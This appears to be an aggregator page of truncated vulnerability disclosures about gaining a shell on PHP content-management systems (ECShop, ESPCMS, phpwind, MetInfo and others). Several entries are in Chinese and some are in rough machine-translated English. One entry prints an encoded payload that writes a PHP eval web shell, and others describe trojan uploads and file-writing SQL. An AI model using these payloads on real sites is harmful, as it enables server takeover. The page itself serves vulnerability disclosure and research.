Discuz! X latest Getshell vulnerabilities EXp(comes with the plug-in)-bug warning-the black bar safety net

dz0day published In fact, we're knife inside has been playing the scrap -. - By worship under the maniac a large cattle... === Looking at before we begin to be like the clouds submitted to the author of the tribute, because it is He that title only makes us sharp knives team to research out, of...

ECSHOP后台低权限sql注入

简要描述： ECSHOP后台低权限sql注入一枚 详细说明： 普通发货员在登陆之后只需要一个订单列表的权限（也就是低权限管理员即可）就可以注入得到超管权限 如有文件权限还可以getshell 问题出在/admin/order.php中 if !empty$COOKIE'ECSCP''lastfilter' $filter = unserializeurldecode$COOKIE'ECSCP''lastfilter';///// //这里urldecode了$COOKIE'ECSCP''lastfilter'，可怜的GPC唉…… if...

ECSHOP后台getshell漏洞

简要描述： ECSHOP 后台getshell 详细说明： admin/editlanguages.php elseif $REQUEST'act' == 'edit' / 语言项的路径 / $langfile = isset$POST'filepath' ? trim$POST'filepath' : ''; / 替换前的语言项 / $srcitems = !empty$POST'item' ? stripslashesdeep$POST'item' : ''; / 修改过后的语言项 / $dstitems = array; $POST'itemid' =...

建站之星(sitestar)最新版后台GETSHELL

简要描述： 建站之星sitestar最新版后台GETSHELL，修改任意文件名。 详细说明： 非解析漏洞，利用自带编辑器重命名功能 编辑器里选本地上传随意上传一图片木马。选择图片空间。 https://images.seebug.org/upload/201312/111725333fea4f533785ba0b7e7a7689bc91402b.jpg 2013121109221924293.jpg是我刚刚上传的木马。双击名字。发现后面的.jpg是不可以修改的。打开浏览器的审查元素功能。 修改文件名的jpg为PHP.随后双击文件名，修改为任意名字。 呵呵，成功了，看看你的小shell去吧...

ECShop网店系统最新版-后台getshell漏洞

简要描述： ECShop网店系统最新版-后台getshell 详细说明： 不会代码审计，大致过程发下。 最新版: 进入后台打开模版管理语言项编辑: 搜索关键字这里我搜索的字母"p": 插入代码： $$fputsfopenbase64decoded3V5dW4ucGhw,w,base64decodePD9waHAgZXZhbCgkX1BPU1RbZnVja10pPz4 效果访问生成 打开用户登录界面因为我们添加的地方是用户信息 https://images.seebug.org/upload/201312/1320120456ea6f94b12cad39c6368ceba849ac0a...

ThinkSAAS某功能设计不当可能导致可以csrf后台GETSHELL

简要描述： ThinkSAAS某处处存在任意文件操作，利用CSRF直接前台导致GETSHELL 详细说明： 首先这里存在问题的是后台系统管理的数据备份还原处。 这里没有过滤sql参数，直接带入，拼接data/baksql/目录，然后进入恢复数据 这里在恢复是判断有没有分卷，没有分卷就直接恢复了，没有处理所要备份的sql文件的路径，类型，内容等，导致操作任意文件。 然后来看看这里数据恢复的操作： 我们抓个包： 我们在前台上传一个图片，图片内容为： Drop TABLE IF EXISTS temp; Create TABLE tempcmd text NOT NULL; Insert IN...

ECSHOP 后台getshell

简要描述： ECSHOP 后台getshell 详细说明： admin/order.php elseif $REQUEST'act' == 'edittemplates' / 更新模板文件的内容 / $filename = @fopen'../' . DATADIR . '/orderprint.html', 'w+'; //写出模板，，只要有一个调用模板就可以getshell了 echo '../' . DATADIR . '/orderprint.html'; echo stripslashes$POST'FCKeditor1'; @fwrite$filename,...

Ecshop后台getshell-2

简要描述： Ecshop后台getshell-2 详细说明： admin/database.php if $REQUEST'act' == 'dumpsql' 省略若干 if empty$REQUEST'sqlfilename' $sqlfilename = $dump-getrandomname; else 省略若干 $sqlfilename = strreplace"0xa", '', trim$REQUEST'sqlfilename'; // 过滤 0xa 非法字符 $pos = strpos$sqlfilename, '.sql'; if $pos !== false...

cmseasy xss+csrf getshell

简要描述： 第一次XSS处就给了你了。 详细说明： lib/tool/frontclass.php None 访问http://localhost/template/default/test.php 漏洞证明： 第一次XSS处就给了你了。...

Cheng's dance CMSPHP3. 0 stored xss getshell-a vulnerability warning-the black bar safety net

This cms before 9 0 someone made a getshell,when is background verification file problem The official website has been patched, so again, source Because the backend login will also need the authentication code so the injection didn't see. There xss Vulnerability file user/member/skinedit.php trtd...

泛微E-office OA管理系统存在任意文件下载及文件上传导致任意代码执行（已getshell）

简要描述： 继续 applychen 的脚步，因为之前我遇到过这个系统，最新官方demo中也确实存在问题。 感谢 applychen 提供的测试账号。 @cncert国家互联网应急中心 有什么问题，可以私信我。 详细说明： 继续 WooYun: 泛微E-office OA管理系统存在SQL注射漏洞可查库 的挖掘 官方demo http://eoffice8.weaver.cn:8028/login.php 测试账号还是那个 xj 存在两个问题： 0x01:任意文件下载漏洞 测试链接...

代码审计系列4: 易思ESPCMS后台功能CSRF导致PHP代码执行

简要描述： 暂无 详细说明： 这是一个后台GETSHELL的漏洞，但是由于该程序没有对CSRF进行防御，所以可以导致CSRF直接GETshell，并且加重危害 漏洞证明： 问题页面：后台-系统设置-网站基本参数设置 对输入的数据并没有进行太过严格的过滤可以导致直接写入恶意PHP代码进配置文件 这里我们来测试一下'网站名称'这一项。 我们构造： None...

躺在地上看代码-ecshop后台注入

简要描述： 后台注入没啥价值- -不过这个点可以任意构造语句 包括drop database;和select into outfile 顺便还自带爆路径 拿来getshell不错 详细说明： admin\include\libmain.php 行718 function getfilter$paramstr = '' $filterfile = basenamePHPSELF, '.php'; if $paramstr $filterfile .= $paramstr; if isset$GET'uselastfilter' &&...

phpwind background getshell-a vulnerability warning-the black bar safety net

Background upload plugin, you can upload one that contains the php Trojan phpwind standard format plug-in installation package, and getshell. 1. First make an installation package, you need to include a manifest. xml file and a php word此处 文件 名为 php.php a. the manifest. the xml is as follows: ? xm...

Espcms加密函数缺陷导致getshell

简要描述： espcms的加解密函数设计存在缺陷，可还原key并伪造cookie登陆后台getshell 详细说明： 程序的加解密函数存在缺陷，可以通过明文和密文逆向还原密钥 后台登陆处没有有效验证cookie有效性导致攻击者可以通过伪造cookie登陆后台 后台可以上传shell 下面一步一步来看 首先是加解密函数eccode function eccode$string, $operation = 'DECODE', $key = '@LFK24s224%@safS3s%1f%', $mcrype = true $result = null; if $operation ==...

ECSHOP cross-site+background file contains=Getshell-a vulnerability warning-the black bar safety net

Brief description: See focus on the application there Ecshop came.. Detailed description: 0x1 the member Center to add the out of stock registry linkman parameters in the background to view in detail when not to do the encoding,leading to cross-site.. 0x2 ecshop background integrate. php file fro...

metinfo 5.1.7 getshell 0day vulnerabilities attached to the use of the Exp-bug warning-the black bar safety net

1:code analysis about/index.php $filpy = basenamedirnameFILE; $fmodule=1; requireonce ‘../include/module.php’; requireonce $module; Binding metinfo global variables covering the mechanisms can contain files Test:http://w/coder/metinfo/about/? module=../robots. txt&fmodule=7 2:getshell Find a can...

HDWiki Xss+CSRF GetShell 0day

简要描述： 啊,这个不知道有没有奖金. Xss + CSRF = Getshell 详细说明： 主要两处问题： 一、前台创建词条时插入内容只是editor的js对敏感code做了客户端过滤，传入服务器后服务器端过滤不够严格，构成Xss。 二、后台对文件编辑时没有限制相对路径的使用，文件可以直接使用相对路径编辑在列表里可以看到默认是绝对路径的，并且在编辑文件位置没有进行验证，构成CSRF。 漏洞证明： 具体利用Getshell： 普通用户前台创建词条： 发布，截包修改： 这里插入的是一个写好的JS，编辑install/index.php内容为一句话木马。 内容如下： function aj...

espcms后台getshell-3，并可利用csrf交互强制管理员getshell

简要描述： 详细说明： 后台修改模板处未过滤，可在模板中插入php代码（此处方便演示，使用了phpinfo 本来，一个后台getshell的危害应该属于较低的，因为需要管理员权限。但是，espcms后台操作无token，通过csrf的交互，就可以强迫管理员干很多事。修改模板为shell的包如下： 无token，所以可以通过一个自动提交表单给管理员点击，然后就会自动getshell了。（此处主要是后台getshell，csrf就不再说了，详细的POC可以查看我以前提交的一些漏洞） 漏洞证明：...

Aspcms静态生成Getshell

简要描述： 由于没有对引发解析的后缀进行过滤 导致可以自定义后缀生成静态解析. 详细说明： 在发表文章中写入shell代码 会解析执行. 针对低版本Apache容器和iis6 均引发该问题 漏洞证明： 自定义生成. GetShell...